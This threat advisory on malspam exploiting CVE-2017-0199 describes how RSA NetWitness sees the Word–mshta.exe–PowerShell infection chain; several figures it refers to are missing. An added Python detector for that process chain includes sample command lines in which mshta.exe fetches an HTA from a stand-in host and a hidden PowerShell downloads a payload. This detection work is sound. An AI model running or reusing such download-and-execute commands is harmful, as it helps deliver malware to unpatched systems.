Over the past few weeks, RSA FirstWatch has noticed an uptick in malspam trying to exploit CVE-2017-0199 to deliver malicious payloads to victim machines. Microsoft has already issued a patch addressing the vulnerability in the affected Office products. Unpatched systems are still at risk of being infected with whatever piece of malware the malspam is distributing at a given time.
The attack starts with a crafted Office document containing an embedded OLE2 link object. If the document is opened in a vulnerable application, an HTTP(S) request is issued to retrieve a malicious HTML Application (HTA). The HTA handler, mshta.exe, is then called to execute the downloaded script, which in turn downloads and executes the final payload.
In this threat advisory we will discuss how RSA NetWitness suite sees the host and network behavior of a couple of delivery documents trying to exploit CVE-2017-0199.
The first delivery document was noticed on August 29th, 2017. Opening the RTF document in an unpatched Microsoft Word led to the following network events:
Let's break down those network sessions. First, a request was made to download an obfuscated script:
The downloaded script was handled by mshta.exe, and another request followed to download an executable:
Next, the malware authenticates to an FTP server and uploads files to it. It also connects to the same server using custom TCP protocols:
Here's the meta registered by NetWitness Packets for the HTTP sessions above:
The second delivery document was also noticed on August 29th, 2017. Opening the malicious document in an unpatched Microsoft Word led to the following:
The scan data from NetWitness Endpoint is shown below:
On the host side, what is typical in this infection scenario is that Winword.exe looks up the handler for the downloaded HTA file through a COM object. The handler, mshta.exe, is then called to execute the malicious script.
In this case the malicious script contains a PowerShell command that downloads the final payload and saves it to the system, so powershell.exe is spawned to run the command:
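The host-side chain described here and at the start of the advisory (Word, then mshta.exe, then powershell.exe) is what an endpoint analyst would hunt for in process-creation telemetry. The following Python example is added here and is not part of the advisory or of NetWitness; it walks a constructed set of Sysmon-style process-creation events (the pid/ppid/image/cmdline fields and all paths are assumed) and reports every Office-to-mshta.exe chain, noting a PowerShell child when one is present:

```python
"""Process-tree detection for the Office -> mshta.exe -> powershell.exe chain."""
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

# Constructed sample log (not from the advisory): an Office host spawning the
# HTA handler, which in turn spawns PowerShell to fetch the final payload.
SAMPLE_EVENTS = [
    Proc(400, 300, r"C:\Windows\explorer.exe", "explorer.exe"),
    Proc(1200, 400, r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
         'WINWORD.EXE "C:\\Users\\victim\\Downloads\\invoice.rtf"'),
    Proc(1300, 1200, r"C:\Windows\System32\mshta.exe",
         "mshta.exe http://example.invalid/doc.hta"),
    Proc(1400, 1300, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "powershell.exe -w hidden (New-Object Net.WebClient).DownloadFile(...)"),
    Proc(1500, 400, r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

# Office hosts that can embed an OLE2 link object and trigger the HTA handler.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (the telemetry logs full paths)."""
    return path.rsplit("\\", 1)[-1].lower()


def find_hta_chains(events):
    """Return (office_pid, mshta_pid, powershell_pid_or_None) for each mshta.exe
    whose parent is an Office host; the third field is set when mshta.exe itself
    spawned powershell.exe, which matches the full infection chain."""
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)
    hits = []
    for e in events:
        if basename(e.image) != "mshta.exe":
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or basename(parent.image) not in OFFICE_HOSTS:
            continue  # mshta.exe with a non-Office parent is out of scope here
        ps = [c for c in children.get(e.pid, [])
              if basename(c.image) == "powershell.exe"]
        hits.append((parent.pid, e.pid, ps[0].pid if ps else None))
    return hits


if __name__ == "__main__":
    for office_pid, mshta_pid, ps_pid in find_hta_chains(SAMPLE_EVENTS):
        print(f"Office pid {office_pid} -> mshta.exe pid {mshta_pid}"
              f" -> powershell.exe pid {ps_pid}")
```

The detection keys on the parent-child relationship, so it does not depend on the obfuscated script contents; a chain that stops at mshta.exe is still reported, with `None` in the PowerShell slot.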
The malware then proceeds to deliver its functionality:
Delivery documents (SHA256):